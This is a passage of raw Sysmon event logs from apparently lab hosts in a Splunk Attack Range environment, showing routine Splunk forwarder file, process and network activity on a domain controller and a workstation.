Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.998{C8EA50B7-0EC5-6216-B304-000000003802}2188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:03.591{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5677A1AA13D95E366EDA9F2F0990D0E5,SHA256=8707A164B8730620AEEAC0C8B41AA31498C339A270EDB54EDC26A802DC9E11BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:03.208{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E57D82C104307CD0FE3D0750CE04E2E7,SHA256=1F595F1BF01D5DDA33689C3C2A5F9C01C77D6582DDC2142EFB4AE06FD84BB69A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:01.598{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53262-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:03.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92582ABEF2C8BF4C52AE73A1A8107A9C,SHA256=C6865A37BFF579189CD1E2DC20D965C66FB3BD5056FD786A04C2C977BEB40F31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:03.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A9C632E5B95FAD2C77D04C7AF5AC043E,SHA256=F3E1F92FBA943FBFEBB9086C6A880873E26E9FBBE56800C2F9D937AC71029A36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.653{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=326AF583F06E17C09CE3400ADECDED28,SHA256=A56A6D3C297BD39CA9A839659A386CFAC8CDD66BB2E3A8CCB232BC1CB2DC5F6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:04.208{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=616328BB838032624C919D660C645B85,SHA256=D9B5350236C5991A54C15798754C1EF658F9D4698BEF2889D3E4D202540BDE34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92582ABEF2C8BF4C52AE73A1A8107A9C,SHA256=C6865A37BFF579189CD1E2DC20D965C66FB3BD5056FD786A04C2C977BEB40F31,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0EC8-6216-B504-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0EC8-6216-B504-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.294{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0EC8-6216-B504-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:04.295{C8EA50B7-0EC8-6216-B504-000000003802}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000214635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:01.524{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51201-false10.0.1.12-8000- 23542300x8000000000000000285513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:05.700{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C8F25AF07E71D61D3EA7CC0F72A6EF1,SHA256=392EA7D4AC22F1F0CC1EAA642EA2B0235C3B23AA9EFD68F0E085B9E59160B153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:05.223{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E00D981C8A9F2D44D86D43F420C06140,SHA256=7DA2928998A6EA12C3E9394C5F4A1EF52E6DC252CA1259200BD604C33331DEEF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:03.114{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53263-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:03.114{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53263-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000285514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:06.747{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA3685AF4A5BE972CBC54AD4701E7EAF,SHA256=76778C33F3942853BCFCABEE42B553CD800F827778A40E8E7294EFAB157ACA70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:06.239{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2059603287A085A5D8A3E07423297D2B,SHA256=E15940E6C19E023B4064A84DCD0E5BD3F2C6BA1B7ED5CD16EFD629622DC4B4EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285515Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:07.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0337B389354EAF18A458A8EA64DDC6F,SHA256=1EA3A374BAFF930ABF5FBD4A36D6E6C38C5609D18DB9EC7043EEBB6CEDD84423,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:07.333{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2AC2C94AF5C73EDF2B93D2F3067DC127,SHA256=1742B9B3B3A74EEF19030AAEB7BEB5113565C1BB5CE20D7274243607C3C2CC0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285517Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:08.872{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A61FD7A51B0BEB9D8773038A5E488BB,SHA256=6342B025F847D9BB595860AAF9B524F76EBDC0D793ADD1A3F12CFDF2FE644D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:08.348{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87CFFAE2D54CC320692CE3A28259E289,SHA256=C281C035B046BDE6AABA53EBAD137432243DCAFBA4A1C8C457A8D8994C456498,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285516Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:06.692{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53264-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285518Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:09.919{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D4C222ED5BABE6558D8CA52DE01626D,SHA256=E4CC179D1255488EEEE3D690A642ECE5E79850A901835DA035D0067174895407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:09.379{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9448F4B434FDE5F67785E81A8915F6BB,SHA256=452C12ADCDA2516B0F3FAA6FC86BC9E9A44803B4C99B923BE50F78CC09849E16,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:06.600{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51202-false10.0.1.12-8000- 23542300x8000000000000000285519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:10.981{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF0892822DAFC580D54454A61BFDC19F,SHA256=64685318EF409188F21DD543D03507147332AFFF740D752269DA5B56A4079BD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:10.395{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAEFCA941D56FE3D519682EF27929A07,SHA256=DBE5515E147B4598E27C66457F8F82772F37F6FD22DBCA43200100456D45AA74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:11.411{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59025643DA8FF124623DC9DCE715BECF,SHA256=BFBFD0396A6D0F5D384E1C94CE8931BCBBC495D04083E33673A564F43977F13A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:12.489{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=777E4F152DF0CE0C05D14F8DEE7BCF57,SHA256=3DE9CFE3162A61104B7E15EA3A43BBF3A6EDC65C94CCA779EF833268D7B2D158,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:12.044{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05988E2815145A6C22FF27DF3C6B637D,SHA256=E983977521084E95983BC2A728CFC1B6CE38D10DC65A97F45D260983C8556521,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:13.567{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A67E5956616C528EB0E7519E8BC029B0,SHA256=7552D62F94E945530F0A13DF49FEBA48F4A58DB914CA19C0A8460EF941C7B0DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:13.059{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C87C8245064B3B10F595445287FF00,SHA256=C3F126AF19A32DA073F479715F10B2162D1DD990593605C81405ED67D65E4B96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214648Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:14.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DDBD6997CCD32133A49CAA8FE5BF9E2,SHA256=8C89E636CC01785C607E42895A3C995F0DE7894037E08EC34F32B2AA9F39B2A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:12.520{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53265-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:39:14.075{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CCA1451A47D294F31CC5B5AB8E16652,SHA256=EB6E5D4F5B60AFB33E6247EE2791E9EA979DE0D9B0D405612E4AD3508DD905AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:12.491{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51203-false10.0.1.12-8000- 23542300x8000000000000000214649Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:39:15.661{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 